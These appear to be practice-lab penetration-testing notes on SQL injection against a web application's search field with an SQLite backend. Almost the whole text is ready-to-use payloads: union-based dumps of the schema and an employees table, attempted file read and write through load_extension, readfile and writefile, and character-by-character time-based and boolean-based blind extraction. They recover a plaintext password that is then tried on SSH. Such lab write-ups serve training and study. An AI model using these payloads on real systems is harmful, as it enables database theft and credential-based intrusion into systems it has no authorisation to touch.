SQLi
/Practice/Robust/3-Exploitation/attachments/{69DD4A93-ACE9-4A4A-830B-2E58C881659C}.png)
SQL injection vulnerability has been identified in the search function of the target web application.
Union-based In-band
/Practice/Robust/3-Exploitation/attachments/{4EC825B2-7D48-4681-9A7A-A75A1E611CE5}.png)
The column count is 4. All 4 columns are reflected.
/Practice/Robust/3-Exploitation/attachments/{BE8786FE-0964-4823-8197-96EF25C6EE6C}.png)
' UNION SELECT 1,sqlite_version(),sqlite_source_id(),4 FROM sqlite_master -- -The backend database is SQLite This was identified after many trials and errors with an assumption of the backend DB being either MySQL or MSSQL
As the name suggest, SQLite is a lightweight relational database with limited functions.
Database Structure (Tables) (Union-based In-band)
/Practice/Robust/3-Exploitation/attachments/{0AE03D6D-6757-4938-BD52-B22C639D39C2}.png)
' UNION SELECT 1,name,3,4 FROM pragma_database_list -- //In SQLite, the concept of “databases” works differently than in MySQL or PostgreSQL. By default, SQLite operates with a single database (usually referred to as main), but it can also have attached databases (like secondary .db files).
/Practice/Robust/3-Exploitation/attachments/{4344B408-0778-449C-9C57-5BA87FA2B12E}.png)
````
' UNION SELECT 1,sql,3,4 FROM sqlite_master -- -Database Structure (Tables)
/Practice/Robust/3-Exploitation/attachments/{14E04F53-366E-4E49-B6B3-76523989BE80}.png)
' UNION SELECT 1,tbl_name,3,4 FROM sqlite_master WHERE type='table' -- -Tables
emplyees and emps tables notably stand out.
emplyees Table (Union-based In-band)
/Practice/Robust/3-Exploitation/attachments/{84408344-366C-4513-9C2E-017FFEF4D778}.png)
' UNION SELECT 1,name,3,4 FROM PRAGMA_TABLE_INFO('employees') -- -A total of 4 columns exists within the emplyees table;
idfirst_namelast_namepassword
emplyees Table Dump (Union-based In-band)
/Practice/Robust/3-Exploitation/attachments/{BBC47788-B743-4A5B-8EA2-7888D22962EA}.png)
' UNION SELECT id,first_name,last_name,password FROM employees -- -
' UNION SELECT * FROM employees -- -A single entry in the employees table.
Jeff Hills user with a password in the Mathsisfun123.
Validating the credential against the target SSH server.
emps Table (Union-based In-band)
/Practice/Robust/3-Exploitation/attachments/{63FDDEC1-FFC3-4B7D-95F0-A4529692CD37}.png)
' UNION SELECT 1,GROUP_CONCAT(name),3,4 FROM PRAGMA_TABLE_INFO('emps') -- -A total of 10 columns exists within the emplyees table;
idfirst_namelast_namebirth_dateaddresspostcodecitystatecountryhidden
These are the same employees shown in the index.php page.
File Read (Union-based In-band)
File read is only possible If load_extension or readfile() is Enabled.
/Practice/Robust/3-Exploitation/attachments/{277617BD-9915-4E1C-A282-654D23F2C7E4}.png)
' UNION SELECT 1,sqlite3_load_extension('C:\Windows\win.ini'),3,4 -- ///Practice/Robust/3-Exploitation/attachments/{22CDA3F3-EC6D-45DB-8E9D-48AEF6D7B14B}.png)
' UNION SELECT 1,load_extension('C:\Windows\win.ini'),3,4 -- ///Practice/Robust/3-Exploitation/attachments/{EBD29101-4A28-406A-ABAC-BD486F7F1A4E}.png)
' UNION SELECT 1,readfile('C:\Windows\win.ini'),3,4 -- //None of them are enabled. File read is not possible.
File Write (Union-based In-band)
writefile() must be enabled.
SELCET writefile('<FILE_NAME>',<CONTENT>);Webroot directory has not been identified. Cannot verify the write operation.
Error-based In-band
Given the SQL error is not visible,Error-based_SQLi is not possible.
Time-based Blind
Affirmational hang for a few seconds
' AND (SELECT CASE WHEN sqlite_version() LIKE '3%' THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN sqlite_version()='3.28.0' THEN RANDOMBLOB(1e8) END) -- -SQLite version is 3.28.0.
' AND (SELECT 1 FROM pragma_database_list WHERE (LIKE('m%',name) AND RANDOMBLOB(100000000))) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM pragma_database_list WHERE name='main' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -There is a DB; main.
Tables (Time-based Blind)
' AND (SELECT CASE WHEN (SELECT 1 FROM sqlite_master WHERE type='table' AND tbl_name LIKE 'e%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM sqlite_master WHERE tbl_name='emps' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -emps table
' AND (SELECT CASE WHEN (SELECT 1 FROM sqlite_master WHERE tbl_name='employees' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -employees table.
emplyees Table (Time-based Blind)
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'pass%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='password' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -employees.password column.
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'first%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='first_name' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'last%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='last_name' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -first_name and last_name columns.
emplyees Table Dump (Time-based Blind)
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name LIKE 'J%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -Firstname is Jeff
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE last_name LIKE 'h%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE last_name LIKE 'hills%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE last_name='Hills' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -case sensitive
Lastname is Hills
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' AND last_name='Hills' AND password LIKE 'Ma%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' AND last_name='Hills' AND password LIKE 'Mathsisfun1%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' AND last_name='Hills' AND password='Mathsisfun123' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -Password is Mathsisfun123
Validating the credential against the target SSH server.
Boolean-based Blind
- Page loads normally for affirmation.
- Blank/error page for false.
/Practice/Robust/3-Exploitation/attachments/{1D6AE99D-5358-4F67-9070-478003572B84}.png)
' AND (SELECT sqlite_version() LIKE '3%') -- -
' AND (SELECT sqlite_version()='3.28.0') -- -3.28.0
/Practice/Robust/3-Exploitation/attachments/{309264F1-965C-48C6-B679-5B4DE1D1F8E8}.png)
' AND (SELECT name LIKE 'm%' FROM pragma_database_list) -- -
' AND (SELECT name='main' FROM pragma_database_list) -- -main DB
Tables (Boolean-based Blind)
/Practice/Robust/3-Exploitation/attachments/{B6624BEC-0148-4CC0-B5E3-F7A9E308F91A}.png)
' AND EXISTS (SELECT 1 FROM sqlite_master WHERE type='table' AND tbl_name LIKE 'e%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM sqlite_master WHERE tbl_name='employees' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM sqlite_master WHERE tbl_name='emps' LIMIT 1) -- -employees and emps tables
employees Table (Boolean-based Blind)
/Practice/Robust/3-Exploitation/attachments/{4E899E06-1B8D-4273-BE7F-8A2E5D36B491}.png)
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'pass%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='password' LIMIT 1) -- -employees.password column.
/Practice/Robust/3-Exploitation/attachments/{5C1FFFE9-EA93-42F9-ADD6-87366E334934}.png)
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'first%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='first_name' LIMIT 1) -- -employees.first_name column.
/Practice/Robust/3-Exploitation/attachments/{106063A4-54C9-49D2-BB83-D059083C88DE}.png)
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'last%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='last_name' LIMIT 1) -- -employees.last_name column.
emplyees Table Dump (Boolean-based Blind)
/Practice/Robust/3-Exploitation/attachments/{43D1B2BC-22A0-4F77-A459-62B9B55B83B8}.png)
' AND EXISTS (SELECT 1 FROM employees WHERE first_name LIKE 'J%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE first_name='Jeff' LIMIT 1) -- -Firstname is Jeff
/Practice/Robust/3-Exploitation/attachments/{186DD6C9-6B46-4039-B2E1-6E0189C19AE5}.png)
' AND EXISTS (SELECT 1 FROM employees WHERE last_name LIKE 'H%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE last_name='Hills' LIMIT 1) -- -Lastname is Hills
' AND EXISTS (SELECT 1 FROM employees WHERE password LIKE 'M%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE password LIKE 'Mathsisf%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE password='Mathsisfun123' LIMIT 1) -- -Password is Mathsisfun123
Validating the credential against the target SSH server.